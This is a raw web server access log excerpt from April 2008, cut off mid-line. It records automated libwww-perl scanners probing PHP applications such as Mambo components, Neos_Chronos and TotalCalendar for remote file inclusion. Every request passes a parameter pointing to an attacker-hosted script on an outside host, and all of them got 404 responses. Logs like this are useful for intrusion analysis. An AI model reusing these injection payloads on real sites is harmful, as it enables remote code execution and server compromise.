85.25.148.183 - - [20/Apr/2008:23:23:35 -0600] "GET /logs/access_log/index.php?body=http://suwarjono.net/scan/id2.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.25.148.183 - - [20/Apr/2008:23:23:35 -0600] "GET /index.php?body=http://suwarjono.net/scan/id2.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.25.148.183 - - [20/Apr/2008:23:23:35 -0600] "GET /logs/index.php?body=http://suwarjono.net/scan/id2.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
85.25.148.183 - - [20/Apr/2008:23:23:39 -0600] "GET /logs/access_log/index.php?body=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.25.148.183 - - [20/Apr/2008:23:23:39 -0600] "GET /index.php?body=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.25.148.183 - - [20/Apr/2008:23:23:40 -0600] "GET /logs/index.php?body=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
203.22.204.43 - - [20/Apr/2008:23:27:23 -0600] "GET /logs/access_log//Neos_Chronos/header.php?base_folder=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
203.22.204.43 - - [20/Apr/2008:23:27:24 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.76"
203.22.204.43 - - [20/Apr/2008:23:27:24 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
203.22.204.43 - - [20/Apr/2008:23:27:33 -0600] "GET /logs/error_log//Neos_Chronos/header.php?base_folder=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
70.86.236.106 - - [20/Apr/2008:23:30:27 -0600] "GET /logs/access_log/errors.php?error=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
69.7.35.50 - - [20/Apr/2008:23:35:37 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
69.7.35.50 - - [20/Apr/2008:23:35:37 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
69.7.35.50 - - [20/Apr/2008:23:35:38 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
86.109.164.42 - - [20/Apr/2008:23:36:25 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
86.109.164.42 - - [20/Apr/2008:23:36:25 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
86.109.164.42 - - [20/Apr/2008:23:36:25 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
216.104.37.122 - - [20/Apr/2008:23:36:32 -0600] "GET /logs/access_log//modules/TotalCalendar/about.php?inc_dir=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
216.104.37.122 - - [20/Apr/2008:23:36:32 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
80.91.118.150 - - [20/Apr/2008:23:36:51 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
80.91.118.150 - - [20/Apr/2008:23:36:51 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
80.91.118.150 - - [20/Apr/2008:23:36:52 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
70.86.236.106 - - [20/Apr/2008:23:37:28 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.810"
217.172.175.130 - - [20/Apr/2008:23:37:38 -0600] "GET /logs/access_log//modules/TotalCalendar/about.php?inc_dir=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 254 "-" "libwww-perl/5.69"
217.172.175.130 - - [20/Apr/2008:23:37:38 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 238 "-" "libwww-perl/5.69"
83.18.104.114 - - [20/Apr/2008:23:37:54 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
83.18.104.114 - - [20/Apr/2008:23: